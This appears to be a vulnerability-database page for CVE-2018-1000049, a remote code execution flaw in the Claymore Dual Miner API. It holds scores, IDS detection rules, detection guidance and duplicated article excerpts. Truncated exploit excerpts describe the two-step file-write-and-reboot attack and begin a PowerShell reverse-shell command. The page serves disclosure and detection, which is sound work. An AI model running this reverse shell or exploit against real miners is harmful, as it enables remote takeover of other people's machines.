CVE-2018-1000049
published 2018-02-09CVE-2018-1000049: Nanopool Claymore Dual Miner version 7.3 and earlier contains a remote code execution vulnerability by abusing the miner API. The flaw can be exploited only if…
PriorityP183high7.5CVSS 3.0
AVNACHPRLUINSUCHIHAH
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
77.30%
99.5th percentile
Nanopool Claymore Dual Miner version 7.3 and earlier contains a remote code execution vulnerability by abusing the miner API. The flaw can be exploited only if the software is executed with read/write mode enabled.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| nanopool | claymore_dual_miner | <= 7.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
bytes↗
706f7765727368656c6c2e657865
bytes↗
5c5c7837665c5c7834355c5c7834635c5c783436
snort
alert tcp $EXTERNAL_NET any -> $HOME_NET 3333 (msg:"ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows"; flow:established,to_server; content:"jsonrpc"; content:"method"; content:"miner_file"; content:".bat"; content:"706f7765727368656c6c2e657865"; fast_pattern; reference:url,exploit-db.com/exploits/45044/; reference:cve,2018-1000049; classtype:attempted-user; sid:2025862; rev:2;)
snort
alert tcp $EXTERNAL_NET any -> $HOME_NET 3333 (msg:"ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux"; flow:established,to_server; content:"jsonrpc"; content:"method"; content:"miner_file"; content:".bash"; content:"5c5c7837665c5c7834355c5c7834635c5c783436"; fast_pattern; reference:url,exploit-db.com/exploits/45044/; reference:cve,2018-1000049; classtype:attempted-user; sid:2025861; rev:1;)
- →Detect exploit stage 1 (file write): Monitor TCP port 3333 for JSON-RPC requests containing 'miner_file' method with 'reboot.bat' (Windows) or 'reboot.bash'/'reboot.sh' (Linux) as the first parameter, followed by a hex-encoded payload string. ↗
- →Detect exploit stage 2 (trigger): Monitor TCP port 3333 for JSON-RPC requests containing 'miner_reboot' method, which triggers execution of the previously written reboot script. ↗
- →The Windows payload hex signature '706f7765727368656c6c2e657865' decodes to 'powershell.exe' — use this as a fast-pattern content match within miner_file traffic on port 3333. ↗
- →Reconnaissance step uses 'miner_getfile' method to retrieve 'config.txt' to fingerprint the target OS before exploitation — alert on this API call as a precursor indicator. ↗
- ·The vulnerability is only exploitable when the miner is started with read/write mode enabled; read-only API mode is not affected. ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.0MEDIUMAV:N/AC:M/Au:S/C:P/I:P/A:P
vulncheck7.5HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-mg4j-hgc5-ggv5: Nanopool Claymore Dual Miner version 7
ghsa_unreviewed·2022-05-13
CVE-2018-1000049 [HIGH] CWE-20 GHSA-mg4j-hgc5-ggv5: Nanopool Claymore Dual Miner version 7
Nanopool Claymore Dual Miner version 7.3 and earlier contains a remote code execution vulnerability by abusing the miner API. The flaw can be exploited only if the software is executed with read/write mode enabled.
VulnCheck
nanopool claymore_dual_miner Improper Input Validation
vulncheck·2018·CVSS 7.5
CVE-2018-1000049 [HIGH] nanopool claymore_dual_miner Improper Input Validation
nanopool claymore_dual_miner Improper Input Validation
Nanopool Claymore Dual Miner version 7.3 and earlier contains a remote code execution vulnerability by abusing the miner API. The flaw can be exploited only if the software is executed with read/write mode enabled.
Affected: nanopool claymore_dual_miner
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/Insecure+Claymore+Miner+Management+API+Exploited+in+the+Wild/23665
Suricata
ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows
suricata·2018-07-17
CVE-2018-1000049 ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows
ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3333 (msg:"ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Windows"; flow:established,to_server; content:"jsonrpc"; content:"method"; content:"miner_file"; content:".bat"; content:"706f7765727368656c6c2e657865"; fast_pattern; reference:url,exploit-db.com/exploits/45044/; reference:cve,2018-1000049; classtype:attempted-user; sid:2025862; rev:2; metadata:attack_target Server, created_at 2018_07_17, cve CVE_2018_100004, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2019_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Suricata
ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux
suricata·2018-07-17
CVE-2018-1000049 ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux
ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux
Rule: alert tcp $EXTERNAL_NET any -> $HOME_NET 3333 (msg:"ET EXPLOIT Nanopool Claymore Dual Miner Remote Code Execution Linux"; flow:established,to_server; content:"jsonrpc"; content:"method"; content:"miner_file"; content:".bash"; content:"5c5c7837665c5c7834355c5c7834635c5c783436"; fast_pattern; reference:url,exploit-db.com/exploits/45044/; reference:cve,2018-1000049; classtype:attempted-user; sid:2025861; rev:1; metadata:attack_target Server, created_at 2018_07_17, cve CVE_2018_100004, deployment Datacenter, confidence Medium, signature_severity Major, updated_at 2019_07_26, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
Exploit-DB
Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)
exploitdb·2018-07-17
CVE-2018-1000049 Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)
Nanopool Claymore Dual Miner - APIs Remote Code Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core/exploit/powershell'
class MetasploitModule 'Nanopool Claymore Dual Miner APIs RCE',
'Description' => %q{
This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
},
'Author' =>
[
'reversebrain@snado', # Vulnerability reporter
'phra@snado' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['EDB', '44638'],
['CVE', '2018-1000049'],
['URL', 'https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/']
],
'Platform' => ['win', 'linux'],
'Targets' =>
[
[ 'Automatic Target', { 'auto' => tru
Exploit-DB
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
exploitdb·2018-05-17
CVE-2018-1000049 Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
Nanopool Claymore Dual Miner 7.3 - Remote Code Execution
---
# Exploit Title: Nanopool Claymore Dual Miner >= 7.3 Remote Code Execution
# Date: 2018/02/09
# Exploit Author: ReverseBrain
# Vendor Homepage: https://nanopool.org/
# Software Link: https://github.com/nanopool/Claymore-Dual-Miner
# Version: 7.3 and later
# Tested on: Windows, Linux
# CVE : 2018-1000049
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Leng
Metasploit
Nanopool Claymore Dual Miner APIs RCE
metasploit
Nanopool Claymore Dual Miner APIs RCE
Nanopool Claymore Dual Miner APIs RCE
This module takes advantage of miner remote manager APIs to exploit an RCE vulnerability.
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
Mikhail Kuzin
Yaroslav Shmelev
Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our honeypot
Securelist
New trends in the world of IoT threats
blogs_securelist·2018-09-18
New trends in the world of IoT threats
Authors
- Mikhail Kuzin
- Yaroslav Shmelev
- Vladimir Kuskov
Cybercriminals’ interest in IoT devices continues to grow: in H1 2018 we picked up three times as many malware samples attacking smart devices as in the whole of 2017. And in 2017 there were ten times more than in 2016. That doesn’t bode well for the years ahead.
We decided to study what attack vectors are deployed by cybercriminals to infect smart devices, what malware is loaded into the system, and what it means for device owners and victims of freshly armed botnets.
Number of malware samples for IoT devices in Kaspersky Lab’s collection, 2016-2018.
One of the most popular attack and infection vectors against devices remains cracking Telnet passwords. In Q2 2018, there were three times as many such attacks against our hone
http://packetstormsecurity.com/files/147678/Nanopool-Claymore-Dual-Miner-7.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/148578/Nanopool-Claymore-Dual-Miner-APIs-Remote-Code-Execution.htmlhttp://www.rapid7.com/db/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rcehttps://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2018/1000xxx/CVE-2018-1000049.jsonhttps://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Executionhttps://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/https://twitter.com/ReverseBrain/status/951850534985662464https://www.exploit-db.com/exploits/44638/https://www.exploit-db.com/exploits/45044/http://packetstormsecurity.com/files/147678/Nanopool-Claymore-Dual-Miner-7.3-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/148578/Nanopool-Claymore-Dual-Miner-APIs-Remote-Code-Execution.htmlhttp://www.rapid7.com/db/modules/exploit/multi/misc/claymore_dual_miner_remote_manager_rcehttps://raw.githubusercontent.com/distributedweaknessfiling/cvelist/master/2018/1000xxx/CVE-2018-1000049.jsonhttps://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Executionhttps://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/https://twitter.com/ReverseBrain/status/951850534985662464https://www.exploit-db.com/exploits/44638/https://www.exploit-db.com/exploits/45044/
2018-02-09
Published
Exploited in the wild